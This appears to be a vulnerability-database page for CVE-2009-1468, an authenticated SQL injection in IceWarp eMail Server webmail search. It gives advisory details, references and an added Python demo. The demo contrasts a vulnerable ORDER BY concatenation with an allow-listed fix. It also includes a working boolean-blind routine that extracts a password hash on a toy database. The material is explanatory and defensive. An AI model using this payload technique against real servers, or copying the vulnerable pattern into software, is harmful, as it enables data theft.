CVE-2009-1468

IceWarp eMail Server < 9.4.2 - Authenticated SQL Injection via XML Search Query


Exploitation Summary

EIP tracks 1 public exploit for CVE-2009-1468, a PoC published by RedTeam Pentesting.

AI-analyzed exploit summary: the exploit demonstrates SQL injection in IceWarp Merak Mail Server (IceWarp eMail Server) by sending a crafted XML search query in a POST request to the webmail endpoint. The script lets an authenticated attacker place arbitrary SQL in the 'order_by' and 'sql' elements of the query, which the server uses to build its database statement, leading to unauthorized data access or manipulation.

Description

Multiple SQL injection vulnerabilities in the search form in server/webmail.php in the Groupware component in IceWarp eMail Server and WebMail Server before 9.4.2 allow remote authenticated users to execute arbitrary SQL commands via the (1) sql and (2) order_by elements in an XML search query.
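The bug class the description and exploit summary above name, shown as an added example that is not IceWarp's code and not the exploit-db PoC: a toy "XML search query" handler whose order_by element is pasted into the ORDER BY clause, beside an allow-listed version, plus a boolean-blind extraction through the vulnerable path. The XML layout, the table and column names and the sample data are assumptions made for the demo.

```python
# Added example, not code from IceWarp or from the exploit-db PoC: a toy
# "XML search query" handler with the bug class CVE-2009-1468 describes
# (the client's <order_by> element concatenated into the ORDER BY clause)
# beside an allow-listed version. The XML layout, table names and columns
# are assumptions made for the demo; nothing here is IceWarp's real schema.
import sqlite3
import xml.etree.ElementTree as ET

ALLOWED_ORDER = {"name", "email"}   # the only identifiers the hardened path accepts

# Constructed sample data: two contacts whose order flips between name and email.
SAMPLE_SCHEMA = """
CREATE TABLE users (login TEXT PRIMARY KEY, pwhash TEXT);
CREATE TABLE contacts (owner TEXT, name TEXT, email TEXT);
INSERT INTO users VALUES ('alice', 'h4f9'), ('mallory', 'm001');
INSERT INTO contacts VALUES ('mallory', 'Dave', 'zed@example.test'),
                            ('mallory', 'Zoe', 'aaa@example.test');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def parse_search(xml_text):
    """Flatten <search><order_by>...</order_by>...</search> into a dict (assumed layout)."""
    root = ET.fromstring(xml_text)
    return {child.tag: (child.text or "").strip() for child in root}


def search_vulnerable(conn, uid, xml_text):
    """Vulnerable: the element text is pasted into the statement. The bound ? protects
    only uid; ORDER BY takes an identifier, which cannot be bound, so any expression runs."""
    q = parse_search(xml_text)
    stmt = "SELECT name, email FROM contacts WHERE owner = ? ORDER BY " + q.get("order_by", "name")
    return conn.execute(stmt, (uid,)).fetchall()


def search_hardened(conn, uid, xml_text):
    """Hardened: refuse a raw <sql> element outright and allow-list <order_by>."""
    q = parse_search(xml_text)
    if "sql" in q:
        raise ValueError("client-supplied SQL is not permitted")
    order_by = q.get("order_by", "name")
    if order_by not in ALLOWED_ORDER:
        raise ValueError("order_by must be one of %s" % sorted(ALLOWED_ORDER))
    stmt = "SELECT name, email FROM contacts WHERE owner = ? ORDER BY " + order_by
    return conn.execute(stmt, (uid,)).fetchall()


def hardened_rejects(conn, uid, xml_text):
    """True when the hardened handler refuses the query."""
    try:
        search_hardened(conn, uid, xml_text)
    except ValueError:
        return True
    return False


def oracle_payload(login, pos, ch):
    """ORDER BY expression: sorts by name when the guessed character is right, else by email."""
    return ("CASE WHEN (SELECT substr(pwhash, %d, 1) FROM users WHERE login = '%s') = '%s' "
            "THEN name ELSE email END" % (pos, login, ch))


def extract_pwhash(conn, uid, login, alphabet="0123456789abcdefghijklmnopqrstuvwxyz", maxlen=16):
    """Boolean-blind extraction through the vulnerable search: no error and no data from
    the users table is ever returned, only which of mallory's two contacts sorts first."""
    found = ""
    for pos in range(1, maxlen + 1):
        for ch in alphabet:
            xml_text = "<search><order_by>%s</order_by></search>" % oracle_payload(login, pos, ch)
            if search_vulnerable(conn, uid, xml_text)[0][0] == "Dave":  # name order means guess right
                found += ch
                break
        else:
            break  # no character matched, so the string ended
    return found


if __name__ == "__main__":
    db = make_db()
    print("leaked:", extract_pwhash(db, "mallory", "alice"))
```

The point of the allow-list is that ORDER BY and WHERE fragments are identifiers and SQL, not values, so a parameterized query cannot protect them; the only safe options are mapping client input to a fixed set of column names and refusing client-supplied SQL altogether, as the hardened handler does.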

Exploits (1)

Exploit-DB · Working PoC · Verified
by RedTeam Pentesting · bash · webapps · php
https://www.exploit-db.com/exploits/32968


Classification
Working PoC (90% confidence)
Attack Type
SQLi
Complexity
Moderate
Reliability
Reliable
Target: IceWarp Merak Mail Server 9.4.1
Auth required: yes
Prerequisites: Valid session ID (sid) · Valid user ID (uid) · Access to the target webmail endpoint
Analyzed by devstral-2 on Feb 16, 2026

References (6)

Core References
Exploit, VDB Entry (BID): http://www.securityfocus.com/bid/34820
Third Party Advisory, VDB Entry (SecurityTracker): http://www.securitytracker.com/id?1022169
Third Party Advisory (VUPEN): http://www.vupen.com/english/advisories/2009/1253
Third Party Advisory, VDB Entry (OSVDB): http://osvdb.org/54228
Third Party Advisory, VDB Entry (Bugtraq mailing list): http://www.securityfocus.com/archive/1/503226/100/0/threaded

Scores

EPSS score: 0.0192 (1.92%)
EPSS percentile: 77.3%

Details

CWE
CWE-89
Status
published
Products (50)
icewarp/email_server 2.10.105
icewarp/email_server 2.10.110
icewarp/email_server 2.10.115
icewarp/email_server 2.10.140
icewarp/email_server 2.10.150
icewarp/email_server 2.10.165
icewarp/email_server 2.10.170
icewarp/email_server 2.10.190
icewarp/email_server 2.10.200
icewarp/email_server 2.10.210
... and 40 more
Published May 05, 2009
Tracked Since Feb 18, 2026